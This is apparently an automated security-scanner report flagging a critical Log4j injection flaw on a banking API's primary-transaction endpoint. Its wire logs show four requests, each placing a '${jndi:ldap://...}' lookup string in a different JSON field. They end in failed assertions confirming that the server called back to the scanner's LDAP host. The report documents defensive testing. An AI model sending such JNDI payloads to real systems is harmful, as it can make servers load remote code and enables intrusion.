Title: log4j_injection Vulnerability on PUT:/api/v1/primary-transaction
Project: NB 58
Description:
Assertion
Log4j Injection is an attack in which the attacker is able to invoke a remote server by injecting a JNDI lookup string, causing the vulnerable application to perform a remote LDAP lookup.
Risk: log4j_injection
Severity: Critical
API Endpoint: http://netbanking.apisec.ai:8080/api/v1/primary-transaction
Environment: Master
Playbook: ApiV1PrimaryTransactionPutBodyParamLog4jInjection
Researcher: [apisec Bot]
QUICK TIPS
Suggestion:
Effort Estimate: null Hrs
Wire Logs:
05:04:08 [D] [AVPTPBPLInjection] : Endpoint [http://netbanking.apisec.ai:8080/api/v1/primary-transaction]
05:04:08 [D] [AVPTPBPLInjection] : Method [PUT]
05:04:08 [D] [AVPTPBPLInjection] : Authorization [Default]
05:04:08 [D] [AVPTPBPLInjection] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization:"Basic "]]
05:04:08 [D] [AVPTPBPLInjection] : Request [{ "amount" : 50.0, "availableBalance" : 1141028332, "createdBy" : "", "createdDate" : "", "description" : "Zvo7vbQ8", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "Zvo7vbQ8", "type" : "${jndi:ldap://cloud.apisec.ai:4389/4610a404-2025-4a91-9830-63c25fcc209c}", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "Zvo7vbQ8", "version" : "" }, "version" : "" }]
05:04:08 [D] [AVPTPBPLInjection] : Status code [200]
05:04:08 [D] [AVPTPBPLInjection] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=Y2IyNDRkZGYtM2VkMy00ODM2LTk1NmEtZjQ4MjM2ZDIzMGZj; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 19 Jan 2023 05:04:07 GMT"]]
05:04:08 [D] [AVPTPBPLInjection] : Response [Hidden]. //To view the response set 'showResponse: true' under policies
05:04:08 [D] [AVPTPBPLInjection] : Response time [1204]
05:04:08 [D] [AVPTPBPLInjection] : Response size [306]
05:04:08 [D] [AVPTPBPLInjection] : Endpoint [http://netbanking.apisec.ai:8080/api/v1/primary-transaction]
05:04:08 [D] [AVPTPBPLInjection] : Method [PUT]
05:04:08 [D] [AVPTPBPLInjection] : Authorization [Default]
05:04:08 [D] [AVPTPBPLInjection] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization:"Basic "]]
05:04:08 [D] [AVPTPBPLInjection] : Request [{ "amount" : 4560.0, "availableBalance" : 2123707148, "createdBy" : "", "createdDate" : "", "description" : "OzRH0CHJ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "${jndi:ldap://cloud.apisec.ai:4389/4610a404-2025-4a91-9830-63c25fcc209c}", "type" : "OzRH0CHJ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "OzRH0CHJ", "version" : "" }, "version" : "" }]
05:04:08 [D] [AVPTPBPLInjection] : Status code [200]
05:04:08 [D] [AVPTPBPLInjection] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=YWY4YmNlOTMtYjY5My00ZTg5LTllZDgtZjZiNzIwZGM4NTgy; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 19 Jan 2023 05:04:07 GMT"]]
05:04:08 [D] [AVPTPBPLInjection] : Response [Hidden]. //To view the response set 'showResponse: true' under policies
05:04:08 [D] [AVPTPBPLInjection] : Response time [870]
05:04:08 [D] [AVPTPBPLInjection] : Response size [306]
05:04:08 [D] [AVPTPBPLInjection] : Endpoint [http://netbanking.apisec.ai:8080/api/v1/primary-transaction]
05:04:08 [D] [AVPTPBPLInjection] : Method [PUT]
05:04:08 [D] [AVPTPBPLInjection] : Authorization [Default]
05:04:08 [D] [AVPTPBPLInjection] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization:"Basic "]]
05:04:08 [D] [AVPTPBPLInjection] : Request [{ "amount" : 1540.0, "availableBalance" : 196975012, "createdBy" : "", "createdDate" : "", "description" : "U1Pp2F58", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "U1Pp2F58", "type" : "U1Pp2F58", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "${jndi:ldap://cloud.apisec.ai:4389/4610a404-2025-4a91-9830-63c25fcc209c}", "version" : "" }, "version" : "" }]
05:04:08 [D] [AVPTPBPLInjection] : Status code [200]
05:04:08 [D] [AVPTPBPLInjection] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=ZjE4Yzk0YjAtOTMwNS00YTA4LThjZDAtNGM4MDdkNmQyY2Q0; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 19 Jan 2023 05:04:07 GMT"]]
05:04:08 [D] [AVPTPBPLInjection] : Response [Hidden]. //To view the response set 'showResponse: true' under policies
05:04:08 [D] [AVPTPBPLInjection] : Response time [1224]
05:04:08 [D] [AVPTPBPLInjection] : Response size [306]
05:04:08 [D] [AVPTPBPLInjection] : Endpoint [http://netbanking.apisec.ai:8080/api/v1/primary-transaction]
05:04:08 [D] [AVPTPBPLInjection] : Method [PUT]
05:04:08 [D] [AVPTPBPLInjection] : Authorization [Default]
05:04:08 [D] [AVPTPBPLInjection] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization:"Basic "]]
05:04:08 [D] [AVPTPBPLInjection] : Request [{ "amount" : 2718.0, "availableBalance" : 2011898732, "createdBy" : "", "createdDate" : "", "description" : "${jndi:ldap://cloud.apisec.ai:4389/4610a404-2025-4a91-9830-63c25fcc209c}", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "f5OaDF1p", "type" : "f5OaDF1p", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "f5OaDF1p", "version" : "" }, "version" : "" }]
05:04:08 [D] [AVPTPBPLInjection] : Status code [200]
05:04:08 [D] [AVPTPBPLInjection] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=OThkNGYyODktNjlhMy00MmQwLTg5MzItMTlmMjlmNmY3MzQ3; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 19 Jan 2023 05:04:07 GMT"]]
05:04:08 [D] [AVPTPBPLInjection] : Response [Hidden]. //To view the response set 'showResponse: true' under policies
05:04:08 [D] [AVPTPBPLInjection] : Response time [1021]
05:04:08 [D] [AVPTPBPLInjection] : Response size [306]
05:04:09 [E] [AVPTPBPLInjection] : Assertion [@SafeServer.@LocalVariable.uuid == null] resolved-to [{"uuid":"4610a404-2025-4a91-9830-63c25fcc209c","ip":"10.92.1.8","timestamp":"2023-01-19T05:04:08.111836Z"} == null] result [Failed]
05:04:09 [E] [AVPTPBPLInjection] : Assertion [@SafeServer.@LocalVariable.uuid == null] resolved-to [{"uuid":"4610a404-2025-4a91-9830-63c25fcc209c","ip":"10.92.1.8","timestamp":"2023-01-19T05:04:08.111836Z"} == null] result [Failed]
05:04:09 [E] [AVPTPBPLInjection] : Assertion [@SafeServer.@LocalVariable.uuid == null] resolved-to [{"uuid":"4610a404-2025-4a91-9830-63c25fcc209c","ip":"10.92.1.8","timestamp":"2023-01-19T05:04:08.111836Z"} == null] result [Failed]
05:04:09 [E] [AVPTPBPLInjection] : Assertion [@SafeServer.@LocalVariable.uuid == null] resolved-to [{"uuid":"4610a404-2025-4a91-9830-63c25fcc209c","ip":"10.92.1.8","timestamp":"2023-01-19T05:04:08.111836Z"} == null] result [Failed]
IMPORTANT LINKS
Vulnerability Details: https://cloud.apisec.ai/#/app/vulnerabilities/projects/8adc80ec84e1cb220184e5f27d494dfb/dashboard/8adc81e585bef95e0185c869b96e1849/details
Project: https://cloud.apisec.ai/#/app/projects/8adc80ec84e1cb220184e5f27d494dfb/dashboard
Environment: https://cloud.apisec.ai/#/app/config-environments/projects/8adc80ec84e1cb220184e5f27d494dfb/environmentList
Scan Dashboard: https://cloud.apisec.ai/#/app/projects/8adc80ec84e1cb220184e5f27d494dfb/profiles/8adc80eb84e1c98e0184e5f2a02953c6/runs/8adc823d85bef6cb0185c869930d41f6
Playbook: https://cloud.apisec.ai/#/app/projects/8adc80ec84e1cb220184e5f27d494dfb/playbooks/ApiV1PrimaryTransactionPutBodyParamLog4jInjection
Coverage: https://cloud.apisec.ai/#/app/config-categories/projects/8adc80ec84e1cb220184e5f27d494dfb/categories
Code Sample: https://cloud.apisec.ai/#/app/vulnerabilities/projects/8adc80ec84e1cb220184e5f27d494dfb/dashboard/8adc81e585bef95e0185c869b96e1849/codesamples
PS: Please contact support@apisec.ai for apisec access and login issues.
--- apisec Bot ---